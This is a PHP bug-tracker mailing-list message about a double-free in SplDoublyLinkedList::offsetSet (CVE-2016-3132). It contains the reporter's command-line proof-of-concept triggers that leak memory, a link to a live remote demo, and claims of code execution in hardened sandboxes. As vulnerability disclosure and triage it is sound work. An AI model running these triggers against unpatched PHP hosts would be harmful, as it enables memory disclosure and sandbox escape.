Bug #71735 [Com]: Double-free in SplDoublyLinkedList::offsetSet

From: Date: Fri, 29 Apr 2016 02:22:34 +0000
Subject: Bug #71735 [Com]: Double-free in SplDoublyLinkedList::offsetSet
References: 1  Groups: php.bugs 
Request: Send a blank email to php-bugs+get-200819@lists.php.net to get a copy of this message
Edit report at https://bugs.php.net/bug.php?id=71735&edit=1

 ID:                 71735
 Comment by:         emmanuel dot law at gmail dot com
 Reported by:        emmanuel dot law at gmail dot com
 Summary:            Double-free in SplDoublyLinkedList::offsetSet
 Status:             Closed
 Type:               Bug
 Package:            SPL related
 Operating System:   *
 PHP Version:        7.0.4
 Block user comment: N
 Private report:     N

 New Comment:

CVE-2016-3132 has been assigned to this. FYI.


Previous Comments:
------------------------------------------------------------------------
[2016-03-21 07:51:55] emmanuel dot law at gmail dot com

Also, the patch works. So either way problem is solved.

------------------------------------------------------------------------
[2016-03-21 07:50:30] emmanuel dot law at gmail dot com

1) Didn't mean to re-open the bug. Was a race condition when both you and I were replying.

2)Here's my last word on why I think it is a security bug. I'll leave the final decision
to you.

==Remote Scenario (nginx)==
Here's a remote exploit that leaks the the memory on server:
Vuln: http://52.63.107.251/71750.php?id=0&times=100
Source code: http://52.63.107.251/71750.php.src


Fatal error: Uncaught OutOfRangeException: Offset invalid or out of range in
/usr/share/nginx/html/71750.php:6 Stack trace: #0 /usr/share/nginx/html/71750.php(6):
SplDoublyLinkedList->offsetSet('0',
'`<\x96\xA6\xD5\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00...') #1 {main} thrown in
/usr/share/nginx/html/71750.php on line 6

===Local scenario===
It is possible to gain (local) code execution within harden php environment where functions such as
exec() or system() are disabled. EG: Harden production environment or sites such as
sandbox.onlinephpfunctions.com and 3v4l.org

------------------------------------------------------------------------
[2016-03-21 06:35:10] stas@php.net

I'm sorry, I'm not sure I understand - all your examples are constructed code run on the
command line, so how that comes to remote exploit? Also, you reopened the bug - did you mean you
still can reproduce it? I could not reproduce it with your examples after the fix, could you please
provide more information about what do you see after the fix?

------------------------------------------------------------------------
[2016-03-21 06:19:49] emmanuel dot law at gmail dot com

The specially crated code i gave was to gain remote code execution. 

Here are several simpler examples that leak the memory. Notice how each time I change the length of
str_repeat, it leaks different part of the memory:

#### Example 1, str_repeat 0x5 #####

$ ~/php-7.0.4/sapi/cli/php -r '(new
SplStack())->offsetSet(0,str_repeat("A",0x05));'    <<< string length 
  
Fatal error: Uncaught OutOfRangeException: Offset invalid or out of range in Command line code:1
Stack trace:
#0 Command line code(1): SplDoublyLinkedList->offsetSet(0, 'function')      
<<<<<< Leaks 'function'
#1 {main}
  thrown in Command line code on line 1



#### Example 2, str_repeat 0x15 #####


$ ~/php-7.0.4/sapi/cli/php -r '(new
SplStack())->offsetSet(0,str_repeat("A",0x15));'

Fatal error: Uncaught OutOfRangeException: Offset invalid or out of range in Command line code:1
Stack trace:
#0 Command line code(1): SplDoublyLinkedList->offsetSet(0,
'\x01\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00...') 
<<<<<< Leaks random bytes in memory
#1 {main}
  thrown in Command line code on line 1



#### Example 3, str_repeat 0x20 #####

$ ~/php-7.0.4/sapi/cli/php -r '(new
SplStack())->offsetSet(0,str_repeat("A",0x20));'

Fatal error: Uncaught OutOfRangeException: Offset invalid or out of range in Command line code:1
Stack trace:
#0 Command line code(1): SplDoublyLinkedList->offsetSet(0, 'OutOfRangeExcep...')    
<<<<<< Leaks other strings in memory
#1 {main}
  thrown in Command line code on line 1



#### Example 4 str_repeat 0x30 #####

$ ~/php-7.0.4/sapi/cli/php -r '(new
SplStack())->offsetSet(0,str_repeat("A",0x30));'

Fatal error: Uncaught OutOfRangeException: Offset invalid or out of range in Command line code:1
Stack trace:
#0 Command line code(1): SplDoublyLinkedList->offsetSet(0, 'AAAAAAAAAAAAAAA...')   
<<< this is the expected output.
#1 {main}
  thrown in Command line code on line 1



This discrepancies in the output are all manifestation of the double free vulnerability. Depending
on what is passed into the vulnerable function, it results in different form of exploitation. Thus I
think it's a security issue. Imagine a plausible code such as:

<?php
new SplStack())->offsetSet($_GET['id'],$_GET['data']);

?>

------------------------------------------------------------------------
[2016-03-21 06:11:11] stas@php.net

Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=28a6ed9f9a36b9c517e4a8a429baf4dd382fc5d5
Log: Fix bug #71735: Double-free in SplDoublyLinkedList::offsetSet

------------------------------------------------------------------------


The remainder of the comments for this report are too long. To view
the rest of the comments, please view the bug report online at

    https://bugs.php.net/bug.php?id=71735


--
Edit this bug report at https://bugs.php.net/bug.php?id=71735&edit=1


Thread (1 message)

  • emmanuel dot law at gmail dot com
  • Unknown Message
    • emmanuel dot law at gmail dot com
« previous php.bugs (#200819) next »